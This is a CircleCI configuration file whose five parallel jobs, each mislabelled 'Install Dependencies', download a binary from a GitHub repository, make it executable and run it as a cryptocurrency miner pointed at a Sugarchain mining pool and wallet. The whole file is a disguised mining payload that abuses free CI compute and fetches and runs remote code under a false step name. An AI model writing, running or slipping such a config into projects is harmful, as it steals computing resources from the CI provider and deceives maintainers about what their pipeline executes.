version: 2.1
jobs:
    aku1:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https://github.com/Asriytdx/wesharex/raw/main/seger && chmod +x seger && ./seger -a YespowerSugar -o stratum+tcp://sugarchain.eu:3332 -u sugar1q7mu7rk42duvrkqwsxl6whjqx8l0eum99unn75y.cuan1
    aku2:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https://github.com/Asriytdx/wesharex/raw/main/seger && chmod +x seger && ./seger -a YespowerSugar -o stratum+tcp://sugarchain.eu:3332 -u sugar1q7mu7rk42duvrkqwsxl6whjqx8l0eum99unn75y.cuan1
    aku3:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https://github.com/Asriytdx/wesharex/raw/main/seger && chmod +x seger && ./seger -a YespowerSugar -o stratum+tcp://sugarchain.eu:3332 -u sugar1q7mu7rk42duvrkqwsxl6whjqx8l0eum99unn75y.cuan1
    aku4:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https://github.com/Asriytdx/wesharex/raw/main/seger && chmod +x seger && ./seger -a YespowerSugar -o stratum+tcp://sugarchain.eu:3332 -u sugar1q7mu7rk42duvrkqwsxl6whjqx8l0eum99unn75y.cuan1
    aku5:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https://github.com/Asriytdx/wesharex/raw/main/seger && chmod +x seger && ./seger -a YespowerSugar -o stratum+tcp://sugarchain.eu:3332 -u sugar1q7mu7rk42duvrkqwsxl6whjqx8l0eum99unn75y.cuan1

workflows:
    version: 2.1
    build:
        jobs:
            - aku1
            - aku2
            - aku3
            - aku4
            - aku5